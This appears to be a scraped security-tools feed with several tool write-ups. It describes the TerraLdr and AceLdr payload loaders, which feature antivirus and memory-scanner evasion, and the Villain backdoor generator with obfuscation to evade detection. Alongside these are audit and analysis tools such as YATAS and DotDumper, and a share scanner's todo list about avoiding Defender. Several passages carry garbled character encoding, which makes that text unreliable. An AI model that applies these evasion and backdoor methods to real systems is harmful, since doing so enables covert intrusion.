[*][03/01/2021 09:37] - 46 (21.20%) shares across 32 systems were non-default.
[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems are configured with 33 potentially excessive ACLs.
[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems allowed READ access.
[*][03/01/2021 09:37] - 1 (0.46%) shares across 1 systems allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) shares across 0 systems are considered HIGH RISK.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] SHARE ACL SUMMARY
[*][03/01/2021 09:37] - 374 ACLs were found.
[*][03/01/2021 09:37] - 374 (100.00%) ACLs were associated with non-default shares.
[*][03/01/2021 09:37] - 33 (8.82%) ACLs were found to be potentially excessive.
[*][03/01/2021 09:37] - 32 (8.56%) ACLs were found that allowed READ access.
[*][03/01/2021 09:37] - 1 (0.27%) ACLs were found that allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) ACLs we re found that are associated with HIGH RISK share names.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] - The 5 most common share names are:
[*][03/01/2021 09:37] - 9 of 14 (64.29%) discovered shares are associated with the top 5 share names.
[*][03/01/2021 09:37] - 4 backup
[*][03/01/2021 09:37] - 2 ssms
[*][03/01/2021 09:37] - 1 test2
[*][03/01/2021 09:37] - 1 test1
[*][03/01/2021 09:37] - 1 users
[*] -----------------------------------------------

HTML Report Examples

Credits

Author
Scott Sutherland (@_nullbind)

Open-Source Code Used
These individuals wrote open source code that was used as part of this project. A big thank you goes out them and their work!

Name Site
Will Schroeder (@harmj0y) https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Warren F (@pscookiemonster) https://github.com/RamblingCookieMonster/Invoke-Parallel
Luben Kirov http://www.gi-architects.co.uk/2016/02/powershell-check-if-ip-or-subnet-matchesfits/

License
BSD 3-Clause

Todos

Pending Fixes/Bugs

  • Update code to avoid defender
  • Fix file listing formating on data insight pages
  • IPv6 addresses dont show up in subnets summary
  • ACLs associated with Builtin\Users sometimes shows up as LocalSystem under undefined conditions, and as a result, doesnt show up in the Excessive Privileges export. - Thanks Sam!

Pending Features

  • Add ability to specify additional groups to target
  • Add directory listing to insights page.
  • Add ability to grab system OS information for data insights.
  • Add visualization: Visual squares with coloring mapped to share volume density by subnet or ip?.
  • Add file type search. (half coded) + add to data insights. Don't forget things like *.aws, *.azure *.gcp directories that store cloud credentials.
  • Add file content search.
  • Add DontExcludePrintShares option
  • Add auto targeting of groups that contain a large % of the user population; over 70% (make configurable). Add as option.
  • Add configuration fid: netlogon and sysvol you may get access denied when using windows 10 unless the setting below is configured. Automat a check for this, and attempt to modify if privs are at correct level. gpedit.msc, go to Computer -> Administrative Templates -> Network -> Network Provider -> Hardened UNC Paths, enable the policy and click "Show" button. Enter your server name (* for all servers) into "Value name" and enter the folowing text "RequireMutualAuthentication=0,RequireIntegrity=0,RequirePrivacy=0" wihtout quotes into the "Value" field.
  • Add an interesting shares based on names to data insights. example: sql, backup, password, etc.
  • Add active sessions data to help identify potential owners/users of share.
  • Pull spns and computer description/spn account descriptions to help identify owner/business unit.
  • Create bloodhound import file / edge (highrisk share)
  • Research to identify additional high risk share names based on common technology
  • Add better support for IPv6
  • Dynamic identification of spikes in high risk share creation/common groupings, need to better summarize supporting detail beyond just the timeline. For each of the data insights, add average number of shares created for insight grouping by year/month (for folder hash / name etc), and the increase the month/year it spikes. (attempt to provide some historical context); maybe even list the most common non default directories being used by each of those. Potentially adding "first seen date" as well.
  • add showing share permissions (along with the already displayed NTFS permissions) and resultant access (most restrictive wins)


TerraLdr - A Payload Loader Designed With Advanced Evasion Features


TerraLdr: A Payload Loader Designed With Advanced Evasion Features

Details:

  • no crt functions imported
  • syscall unhooking using KnownDllUnhook
  • api hashing using Rotr32 hashing algo
  • payload encryption using rc4 - payload is saved in .rsrc
  • process injection - targetting 'SettingSyncHost.exe'
  • ppid spoofing & blockdlls policy using NtCreateUserProcess
  • stealthy remote process injection - chunking
  • using debugging & NtQueueApcThread for payload execution

Usage:

Thanks For:

Notes:

  • "SettingSyncHost.exe" isnt found on windows 11 machine, while i didnt tested with w11, its a must to change the process name to something else before testing
  • it is possibly better to compile with "ISO C++20 Standard (/std:c++20)"

Profit:

Demo (by @ColeVanlanding1) :


Tested with cobalt strike && Havoc on windows 10



YATAS - A Simple Tool To Audit Your AWS Infrastructure For Misconfiguration Or Potential Security Issues With Plugins Integration


Yet Another Testing & Auditing Solution

The goal of YATAS is to help you create a secure AWS environment without too much hassle. It won't check for all best practices but only for the ones that are important for you based on my experience. Please feel free to tell me if you find something that is not covered.


Features

YATAS is a simple and easy to use tool to audit your infrastructure for misconfiguration or potential security issues.

No details Details

Installation

brew tap padok-team/tap
brew install yatas
yatas --init

Modify .yatas.yml to your needs.

yatas --install

Installs the plugins you need.

Usage

yatas -h

Flags:

  • --details: Show details of the issues found.
  • --compare: Compare the results of the previous run with the current run and show the differences.
  • --ci: Exit code 1 if there are issues found, 0 otherwise.
  • --resume: Only shows the number of tests passing and failing.
  • --time: Shows the time each test took to run in order to help you find bottlenecks.
  • --init: Creates a .yatas.yml file in the current directory.
  • --install: Installs the plugins you need.
  • --only-failure: Only show the tests that failed.

Plugins

Plugins Description Checks
AWS Audit AWS checks Good practices and security checks
Markdown Reports Reporting Generates a markdown report

Checks

Ignore results for known issues

You can ignore results of checks by adding the following to your .yatas.yml file:

ignore:
- id: "AWS_VPC_004"
regex: true
values:
- "VPC Flow Logs are not enabled on vpc-.*"
- id: "AWS_VPC_003"
regex: false
values:
- "VPC has only one gateway on vpc-08ffec87e034a8953"

Exclude a test

You can exclude a test by adding the following to your .yatas.yml file:

plugins:
- name: "aws"
enabled: true
description: "Check for AWS good practices"
exclude:
- AWS_S3_001

Specify which tests to run

To only run a specific test, add the following to your .yatas.yml file:

plugins:
- name: "aws"
enabled: true
description: "Check for AWS good practices"
include:
- "AWS_VPC_003"
- "AWS_VPC_004"

Get error logs

You can get the error logs by adding the following to your env variables:

export YATAS_LOG_LEVEL=debug

The available log levels are: debug, info, warn, error, fatal, panic and off by default

AWS - 63 Checks

AWS Certificate Manager

  • AWS_ACM_001 ACM certificates are valid
  • AWS_ACM_002 ACM certificate expires in more than 90 days
  • AWS_ACM_003 ACM certificates are used

APIGateway

  • AWS_APG_001 ApiGateways logs are sent to Cloudwatch
  • AWS_APG_002 ApiGateways are protected by an ACL
  • AWS_APG_003 ApiGateways have tracing enabled

AutoScaling

  • AWS_ASG_001 Autoscaling maximum capacity is below 80%
  • AWS_ASG_002 Autoscaling group are in two availability zones

Backup

  • AWS_BAK_001 EC2's Snapshots are encrypted
  • AWS_BAK_002 EC2's snapshots are younger than a day old

Cloudfront

  • AWS_CFT_001 Cloudfronts enforce TLS 1.2 at least
  • AWS_CFT_002 Cloudfronts only allow HTTPS or redirect to HTTPS
  • AWS_CFT_003 Cloudfronts queries are logged
  • AWS_CFT_004 Cloudfronts are logging Cookies
  • AWS_CFT_005 Cloudfronts are protected by an ACL

CloudTrail

  • AWS_CLD_001 Cloudtrails are encrypted
  • AWS_CLD_002 Cloudtrails have Global Service Events Activated
  • AWS_CLD_003 Cloudtrails are in multiple regions

COG

  • AWS_COG_001 Cognito allows unauthenticated users

DynamoDB

  • AWS_DYN_001 Dynamodbs are encrypted
  • AWS_DYN_002 Dynamodb have continuous backup enabled with PITR

EC2

  • AWS_EC2_001 EC2s don't have a public IP
  • AWS_EC2_002 EC2s have the monitoring option enabled

ECR

  • AWS_ECR_001 ECRs image are scanned on push
  • AWS_ECR_002 ECRs are encrypted
  • AWS_ECR_003 ECRs tags are immutable

EKS

  • AWS_EKS_001 EKS clusters have logging enabled
  • AWS_EKS_002 EKS clusters have private endpoint or strict public access

LoadBalancer

  • AWS_ELB_001 ELB have access logs enabled

GuardDuty

  • AWS_GDT_001 GuardDuty is enabled in the account

IAM

  • AWS_IAM_001 IAM Users have 2FA activated
  • AWS_IAM_002 IAM access key younger than 90 days
  • AWS_IAM_003 IAM User can't elevate rights
  • AWS_IAM_004 IAM Users have not used their password for 120 days

Lambda

  • AWS_LMD_001 Lambdas are private
  • AWS_LMD_002 Lambdas are in a security group
  • AWS_LMD_003 Lambdas are not with errors

RDS

  • AWS_RDS_001 RDS are encrypted
  • AWS_RDS_002 RDS are backedup automatically with PITR
  • AWS_RDS_003 RDS have minor versions automatically updated
  • AWS_RDS_004 RDS aren't publicly accessible
  • AWS_RDS_005 RDS logs are exported to cloudwatch
  • AWS_RDS_006 RDS have the deletion protection enabled
  • AWS_RDS_007 Aurora Clusters have minor versions automatically updated
  • AWS_RDS_008 Aurora RDS are backedup automatically with PITR
  • AWS_RDS_009 Aurora RDS have the deletion protection enabled
  • AWS_RDS_010 Aurora RDS are encrypted
  • AWS_RDS_011 Aurora RDS logs are exported to cloudwatch
  • AWS_RDS_012 Aurora RDS aren't publicly accessible

S3 Bucket

  • AWS_S3_001 S3 are encrypted
  • AWS_S3_002 S3 buckets are not global but in one zone
  • AWS_S3_003 S3 buckets are versioned
  • AWS_S3_004 S3 buckets have a retention policy
  • AWS_S3_005 S3 bucket have public access block enabled

Volume

  • AWS_VOL_001 EC2's volumes are encrypted
  • AWS_VOL_002 EC2 are using GP3
  • AWS_VOL_003 EC2 have snapshots
  • AWS_VOL_004 EC2's volumes are unused

VPC

  • AWS_VPC_001 VPC CIDRs are bigger than /20
  • AWS_VPC_002 VPC can't be in the same account
  • AWS_VPC_003 VPC only have one Gateway
  • AWS_VPC_004 VPC Flow Logs are activated
  • AWS_VPC_005 VPC have at least 2 subnets

How to create a new plugin ?

You'd like to add a new plugin ? Then simply visit yatas-plugin and follow the instructions.



AceLdr - Cobalt Strike UDRL For Memory Scanner Evasion


A position-independent reflective loader for Cobalt Strike. Zero results from Hunt-Sleeping-Beacons, BeaconHunter, BeaconEye, Patriot, Moneta, PE-sieve, or MalMemDetect.ย 


Features

Easy to Use

Import a single CNA script before generating shellcode.

Dynamic Memory Encryption

Creates a new heap for any allocations from Beacon and encrypts entries before sleep.

Code Obfuscation and Encryption

Changes the memory containing CS executable code to non-executable and encrypts it (FOLIAGE).

Return Address Spoofing at Execution

Certain WinAPI calls are executed with a spoofed return address (InternetConnectA, NtWaitForSingleObject, RtlAllocateHeap).

Sleep Without Sleep

Delayed execution using WaitForSingleObjectEx.

RC4 Encryption

All encryption performed with SystemFunction032.

Known Issues

  • Not compatible with loaders that rely on the shellcode thread staying alive.

References

This project would not have been possible without the following:

Other features and inspiration were taken from the following:



REST-Attacker - Designed As A Proof-Of-Concept For The Feasibility Of Testing Generic Real-World REST Implementations


REST-Attacker is an automated penetration testing framework for APIs following the REST architecture style. The tool's focus is on streamlining the analysis of generic REST API implementations by completely automating the testing process - including test generation, access control handling, and report generation - with minimal configuration effort. Additionally, REST-Attacker is designed to be flexible and extensible with support for both large-scale testing and fine-grained analysis.

REST-Attacker is maintained by the Chair of Network & Data Security of the Ruhr University of Bochum.


Features

REST-Attacker currently provides these features:

  • Automated generation of tests
    • Utilize an OpenAPI description to automatically generate test runs
    • 32 integrated security tests based on OWASP and other scientific contributions
    • Built-in creation of security reports
  • Streamlined API communication
    • Custom request interface for the REST security use case (based on the Python3 requests module)
    • Communicate with any generic REST API
  • Handling of access control
    • Background authentication/authorization with API
    • Support for the most popular access control mechanisms: OAuth2, HTTP Basic Auth, API keys and more
  • Easy to use & extend
    • Usable as standalone (CLI) tool or as a module
    • Adapt test runs to specific APIs with extensive configuration options
    • Create custom test cases or access control schemes with the tool's interfaces

Install

Get the tool by downloading or cloning the repository:

git clone https://github.com/RUB-NDS/REST-Attacker.git

You need Python >3.10 for running the tool.

You also need to install the following packages with pip:

python3 -m pip install -r requirements.txt

Quickstart

Here you can find a quick rundown of the most common and useful commands. You can find more information on each command and other about available configuration options in our usage guides.

Get the list of supported test cases:

python3 -m rest_attacker --list

Basic test run (with load-time test case generation):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate

Full test run (with load-time and runtime test case generation + rate limit handling):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --propose --handle-limits

Test run with only selected test cases (only generates test cases for test cases scopes.TestTokenRequestScopeOmit and resources.FindSecurityParameters):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --test-cases scopes.TestTokenRequestScopeOmit resources.FindSecurityParameters

Rerun a test run from a report:

python3 -m rest_attacker <cfg-dir-or-openapi-file> --run /path/to/report.json

Documentation

Usage guides and configuration format documentation can be found in the documentation subfolders.

Troubleshooting

For fixes/mitigations for known problems with the tool, see the troubleshooting docs or the Issues section.

Contributing

Contributions of all kinds are appreciated! If you found a bug or want to make a suggestion or feature request, feel free to create a new issue in the issue tracker. You can also submit fixes or code ammendments via a pull request.

Unfortunately, we can be very busy sometimes, so it may take a while before we respond to comments in this repository.

License

This project is licensed under GNU LGPLv3 or later (LGPL3+). See COPYING for the full license text and CONTRIBUTORS.md for the list of authors.



DotDumper - An Automatic Unpacker And Logger For DotNet Framework Targeting Files


An automatic unpacker and logger for DotNet Framework targeting files! This tool has been unveiled at Black Hat USA 2022.

The automatic detection and classification of any given file in a reliable manner is often considered the holy grail of malware analysis. The trials and tribulations to get there are plenty, which is why the creation of such a system is held in high regard. When it comes to DotNet targeting binaries, our new open-source tool DotDumper aims to assist in several of the crucial steps along the way: logging (in-memory) activity, dumping interesting memory segments, and extracting characteristics from the given sample.


Why DotDumper?

In brief, manual unpacking is a tedious process which consumes a disproportional amount of time for analysts. Obfuscated binaries further increase the time an analyst must spend to unpack a given file. When scaling this, organizations need numerous analysts who dissect malware daily, likely in combination with a scalable sandbox. The lost valuable time could be used to dig into interesting campaigns or samples to uncover new threats, rather than the mundane generic malware that is widely spread. Afterall, analysts look for the few needles in the haystack.

So, what difference does DotDumper make? Running a DotNet based malware sample via DotDumper provides log files of crucial, contextualizing, and common function calls in three formats (human readable plaintext, JSON, and XML), as well as copies from useful in-memory segments. As such, an analyst can skim through the function call log. Additionally, the dumped files can be scanned to classify them, providing additional insight into the malware sample and the data it contains. This cuts down on time vital to the triage and incident response processes, and frees up SOC analyst and researcher time for more sophisticated analysis needs.

Features

To log and dump the contextualizing function calls and their results, DotDumper uses a mixture of reflection and managed hooks, all written in pure C#. Below, key features will be highlighted and elaborated upon, in combination with excerpts of DotDumperโ€™s results of a packed AgentTesla stealer sample, the hashes of which are below.

Hash type Hash value
SHA-256 b7512e6b8e9517024afdecc9e97121319e7dad2539eb21a79428257401e5558d
SHA-1 c10e48ee1f802f730f41f3d11ae9d7bcc649080c
MD-5 23541daadb154f1f59119952e7232d6b

Using the command-line interface

DotDumper is accessible through a command-line interface, with a variety of arguments. The image below shows the help menu. Note that not all arguments will be discussed, but rather the most used ones.

The minimal requirement to run a given sample, is to provide the โ€œ-fileโ€ argument, along with a file name or file path. If a full path is given, it is used. If a file name is given, the current working directory is checked, as well as the folder of DotDumperโ€™s executable location.

Unless a directory name is provided, the โ€œ-logโ€ folder name is set equal to the file name of the sample without the extension (if any). The folder is located in the same folder as DotDumper resides in, which is where the logs and dumped files will be saved in.

In the case of a library, or an alternative entry point into a binary, one must override the entry point using โ€œ-overrideEntry trueโ€. Additionally, one has to provide the fully qualified class, which includes the name space using โ€œ-fqcn My.NameSpace.MyClassโ€. This tells DotDumper which class to select, which is where the provided function name (using โ€œ-functionName MyFunctionโ€) is retrieved.

If the selected function requires arguments, one has to provide the number of arguments using โ€œ-argcโ€ and the number of required arguments. The argument types and values are to be provided as โ€œstring|myValue int|9โ€. Note that when spaces are used in the values, the argument on the command-line interface needs to be encapsulated between quotes to ensure it is passed as a single argument.

Other less frequently used options such as โ€œ-raceTimeโ€ or โ€œ-deprecatedโ€ are safe in their default settings but might require tweaking in the future due to changes in the DotNet Framework. They are currently exposed in the command-line interface to easily allow changes, if need be, even if one is using an older version of DotDumper when the time comes.

Logging and dumping

Logging and dumping are the two core features of DotDumper. To minimize the amount of time the analysis takes, the logging should provide context to the analyst. This is done by providing the analyst with the following information for each logged function call:

  • A stack trace based on the functionโ€™s caller
  • Information regarding the assembly object where the call originated from, such as the name, version, and cryptographic hashes
  • The parent assembly, from which the call originates if it is not the original sample
  • The type, name, and value of the functionโ€™s arguments
  • The type, name, and value of functionโ€™s return value, if any
  • A list of files which are dumped to disk which correspond with the given function call

Note that for each dumped file, the file name is equal to the fileโ€™s SHA-256 hash.

To clarify the above, an excerpt of a log is given below. The excerpt shows the details for the aforementioned AgentTesla sample, where it loads the second stage using DotNetโ€™s Assembly.Load function.

First, the local system time is given, together with the original functionโ€™s return type, name, and argument(s). Second, the stack trace is given, where it shows that the sampleโ€™s main function leads to a constructor, initialises the components, and calls two custom functions. The Assembly.Load function was called from within โ€œNavigationLib.TaskEightBestOil.GGGGGGGGGGGGGGGGGGGG(String str)โ€. This provides context for the analyst to find the code around this call if it is of interest.

Then, information regarding the assembly call order is given. The more stages are loaded, the more complex it becomes to see via which stages the call came to be. One normally expects one stage to load the next, but in some cases later stages utilize previous stages in a non-linear order. Additionally, information regarding the originating assembly is given to further enrich the data for the analyst.

Next, the parent hash is given. The parent of a stage is the previous stage, which in this example is not yet present. The newly loaded stage will have this stage as its parent. This allows the analyst to correlate events more easily.

Finally, the functionโ€™s return type and value are stored, along with the type, name, and value of each argument that is passed to the hooked function. If any variable is larger than 100 bytes in size, it is stored on the disk instead. A reference is then inserted in the log to reference the file, rather than showing the value. The threshold has been set to avoid hiccups in the printing of the log, as some arrays are thousands of indices in size.

Reflection

Per Microsoftโ€™s documentation, reflection is best summarized as โ€œ[โ€ฆ] provides objects that encapsulate assemblies, modules, and typesโ€. In short, this allows the dynamic creation and invocation of DotNet classes and functions from the malware sample. DotDumper contains a reflective loader which allows an analyst to load and analyze both executables and libraries, as long as they are DotNet Framework based.

To utilize the loader, one has to opt to overwrite the entry point in the command-line interface, specify the class (including the namespace it resides in) and function name within a given file. Optionally, one can provide arguments to the specified function, for all native types and arrays thereof. Examples of native types are int, string, char, and arrays such as int[], string[], and char[]. All the arguments are to be provided via the command-line interface, where both the type and the value are to be specified.

Not overriding the entry point results in the default entry point being used. By default, an empty string array is passed towards the sampleโ€™s main function, as if the sample is executed without arguments. Additionally, reflection is often used by loaders to invoke a given function in a given class in the next stage. Sometimes, arguments are passed along as well, which are used later to decrypt a resource. In the aforementioned AgentTesla sample, this exact scenario plays out. DotDumperโ€™s invoke related hooks log these occurrences, as can be seen below.

The function name in the first line is not an internal function of the DotNet Framework, but rather a call to a specific function in the second stage. The types and names of the three arguments are listed in the function signature. Their values can be found in the function argument information section. This would allow an analyst to load the second stage in a custom loader with the given values for the arguments, or even do this using DotDumper by loading the previously dumped stage and providing the arguments.

Managed hooks

Before going into managed hooks, one needs to understand how hooks work. There are two main variables to consider here: the target function and a controlled function which is referred to as the hook. Simply put, the memory at the target function (i.e. Assembly.Load) is altered to instead to jump to the hook. As such, the programโ€™s execution flow is diverted. The hook can then perform arbitrary actions, optionally call the original function, after which it returns the execution to the caller together with a return value if need be. The diagram below illustrates this process.

Knowing what hooks are is essential to understand what managed hooks are. Managed code is executed in a virtual and managed environment, such as the DotNet runtime or Javaโ€™s virtual machine. Obtaining the memory address where the managed function resides differs from an unmanaged language such as C. Once the correct memory addresses for both functions have been obtained, the hook can be set by directly accessing memory using unsafe C#, along with DotNetโ€™s interoperability service to call native Windows API functionality.

Easily extendible

Since DotDumper is written in pure C# without any external dependencies, one can easily extend the framework using Visual Studio. The code is documented in this blog, on GitHub, and in classes, in functions, and in-line in the source code. This, in combination with the clear naming scheme, allows anyone to modify the tool as they see fit, minimizing the time and effort that one needs to spend to understand the tool. Instead, it allows developers and analysts alike to focus their efforts on the toolโ€™s improvement.

Differences with known tooling

With the goal and features of DotDumper clear, it might seem as if thereโ€™s overlap with known publicly available tools such as ILSpy, dnSpyEx, de4dot, or pe-sieve. Note that there is no intention to proclaim one tool is better than another, but rather how the tools differ.

DotDumperโ€™s goal is to log and dump crucial, contextualizing, and common function calls from DotNet targeting samples. ILSpy is a DotNet disassembler and decompiler, but does not allow the execution of the file. dnSpyEx (and its predecessor dnSpy) utilise ILSpy as the disassembler and decompiler component, while adding a debugger. This allows one to manually inspect and manipulate memory. de4dot is solely used to deobfuscate DotNet binaries, improving the codeโ€™s readability for human eyes. The last tool in this comparison, pe-sieve, is meant to detect and dump malware from running processes, disregarding the used programming language. The table below provides a graphical overview of the above-mentioned tools.

Future work

DotDumper is under constant review and development, all of which is focused on two main areas of interest: bug fixing and the addition of new features. During the development, the code was tested, but due to injection of hooks into the DotNet Frameworkโ€™s functions which can be subject to change, itโ€™s very well possible that there are bugs in the code. Anyone who encounters a bug is urged to open an issue on the GitHub repository, which will then be looked at. The suggestion of new features is also possible via the GitHub repository. For those with a GitHub account, or for those who rather not publicly interact, feel free to send me a private message on my Twitter.

Needless to say, if you've used DotDumper during an analysis, or used it in a creative way, feel free to reach out in public or in private! Thereโ€™s nothing like hearing about the usage of a home-made tool!

There is more in store for DotDumper, and an update will be sent out to the community once it is available!



ExchangeFinder - Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version


ExchangeFinder is a simple and open-source tool that tries to find Micrsoft Exchange instance for a given domain based on the top common DNS names for Microsoft Exchange.

ExchangeFinder can identify the exact version of Microsoft Exchange starting from Microsoft Exchange 4.0 to Microsoft Exchange Server 2019.


How does it work?

ExchangeFinder will first try to resolve any subdomain that is commonly used for Exchange server, then it will send a couple of HTTP requests to parse the content of the response sent by the server to identify if it's using Microsoft Exchange or not.

Currently, the tool has a signature of every version from Microsoft Exchange starting from Microsoft Exchange 4.0 to Microsoft Exchange Server 2019, and based on the build version sent by Exchange via the header X-OWA-Version we can identify the exact version.

If the tool found a valid Microsoft Exchange instance, it will return the following results:

  • Domain name.
  • Microsoft Exchange version.
  • Login page.
  • Web server version.

Installation & Requirements

Clone the latest version of ExchangeFinder using the following command:

git clone https://github.com/mhaskar/ExchangeFinder

And then install all the requirements using the command poetry install.

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/ExchangeFinder]
โ””โ”€$ poetry install 1 โจฏ
Installing dependencies from lock file


Package operations: 15 installs, 0 updates, 0 removals

โ€ข Installing pyparsing (3.0.9)
โ€ข Installing attrs (22.1.0)
โ€ข Installing certifi (2022.6.15)
โ€ข Installing charset-normalizer (2.1.1)
โ€ข Installing idna (3.3)
โ€ข Installing more-itertools (8.14.0)
โ€ข Installing packaging (21.3)
โ€ข Installing pluggy (0.13.1)
โ€ข Installing py (1.11.0)
โ€ข Installing urllib3 (1.26.12)
โ€ข Installing wcwidth (0.2.5)
โ€ข Installing dnspython (2.2.1)
โ€ข Installing pytest (5.4.3)
โ€ข Installing requests (2.28.1)
โ€ข Installing termcolor (1.1.0)< br/>
Installing the current project: ExchangeFinder (0.1.0)

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/ExchangeFinder]

โ”Œโ”€โ”€(kaliใ‰ฟkali)-[~/Desktop/ExchangeFinder]
โ””โ”€$ python3 exchangefinder.py


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[-] Please use --domain or --domains option

โ”Œโ”€โ”€(kali&#129 27;kali)-[~/Desktop/ExchangeFinder]
โ””โ”€$

Usage

You can use the option -h to show the help banner:

Scan single domain

To scan single domain you can use the option --domain like the following:

askarโ€ข/opt/redteaming/ExchangeFinder(mainโšก)ยป python3 exchangefinder.py --domain dummyexchangetarget.com                                                                                           


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[!] Scanning domain dummyexch angetarget.com
[+] The following MX records found for the main domain
10 mx01.dummyexchangetarget.com.

[!] Scanning host (mail.dummyexchangetarget.com)
[+] IIS server detected (https://mail.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://mail.dummyexchangetarget.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

[!] Scanning host (autodiscover.dummyexchangetarget.com)
[+] IIS server detected (https://autodiscover.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://autodiscover.dummyexchangetarget.com Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://autodiscover.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fautodiscover.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

askarโ€ข/opt/redteaming/ExchangeFinder(mainโšก)ยป

Scan multiple domains

To scan multiple domains (targets) you can use the option --domains and choose a file like the following:

askarโ€ข/opt/redteaming/ExchangeFinder(mainโšก)ยป python3 exchangefinder.py --domains domains.txt                                                                                                          


______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/

Find that Microsoft Exchange server ..

[+] Total domains to scan are 2 domains
[!] Scanning domain externalcompany.com
[+] The following MX records f ound for the main domain
20 mx4.linfosyshosting.nl.
10 mx3.linfosyshosting.nl.

[!] Scanning host (mail.externalcompany.com)
[+] IIS server detected (https://mail.externalcompany.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://mail.externalcompany.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.externalcompany.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.externalcompany.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0

[!] Scanning domain o365.cloud
[+] The following MX records found for the main domain
10 mailstore1.secureserver.net.
0 smtp.secureserver.net.

[!] Scanning host (mail.o365.cloud)
[+] IIS server detected (https://mail.o365.cloud)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:

Domain Found : https://mail.o365.cloud
Exchange version : Exchange Server 2013 CU23 May22SU
Login page : https://mail.o365.cloud/owa/auth/logon.aspx?url=https%3a%2f%2fmail.o365.cloud%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/8.5

askarโ€ข/opt/redteaming/ExchangeFinder(mainโšก)ยป

Please note that the examples used in the screenshots are resolved in the lab only

This tool is very simple and I was using it to save some time while searching for Microsoft Exchange instances, feel free to open PR if you find any issue or you have a new thing to add.

License

This project is licensed under the GPL-3.0 License - see the LICENSE file for details



Villain - Windows And Linux Backdoor Generator And Multi-Session Handler That Allows Users To Connect With Sibling Servers And Share Their Backdoor Sessions


Villain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team.

The main idea behind the payloads generated by this tool is inherited from HoaxShell. One could say that Villain is an evolved, steroid-induced version of it.

This is an early release currently being tested.
If you are having detection issues, watch this video on how to bypass signature-based detection

Video Presentation

[2022-11-30] Recent & awesome, made by John Hammond -> youtube.com/watch?v=pTUggbSCqA0
[2022-11-14] Original release demo, made by me -> youtube.com/watch?v=NqZEmBsLCvQ

Disclaimer: Running the payloads generated by this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.


Installation & Usage

git clone https://github.com/t3l3machus/Villain
cd ./Villain
pip3 install -r requirements.txt

You should run as root:

Villain.py [-h] [-p PORT] [-x HOAX_PORT] [-c CERTFILE] [-k KEYFILE] [-u] [-q]

For more information about using Villain check out the Usage Guide.

Important Notes

  1. Villain has a built-in auto-obfuscate payload function to assist users in bypassing AV solutions (for Windows payloads). As a result, payloads are undetected (for the time being).
  2. Each generated payload is going to work only once. An already used payload cannot be reused to establish a session.
  3. The communication between sibling servers is AES encrypted using the recipient sibling server's ID as the encryption KEY and the 16 first bytes of the local server's ID as IV. During the initial connection handshake of two sibling servers, each server's ID is exchanged clear text, meaning that the handshake could be captured and used to decrypt traffic between sibling servers. I know it's "weak" that way. It's not supposed to be super secure as this tool was designed to be used during penetration testing / red team assessments, for which this encryption schema should be enough.
  4. Villain instances connected with each other (sibling servers) must be able to directly reach each other as well. I intend to add a network route mapping utility so that sibling servers can use one another as a proxy to achieve cross network communication between them.

Approach

A few notes about the http(s) beacon-like reverse shell approach:

Limitations

  • A backdoor shell is going to hang if you execute a command that initiates an interactive session. For more information read this.

Advantages

  • When it comes to Windows, the generated payloads can run even in PowerShell constraint Language Mode.
  • The generated payloads can run even by users with limited privileges.

Contributions

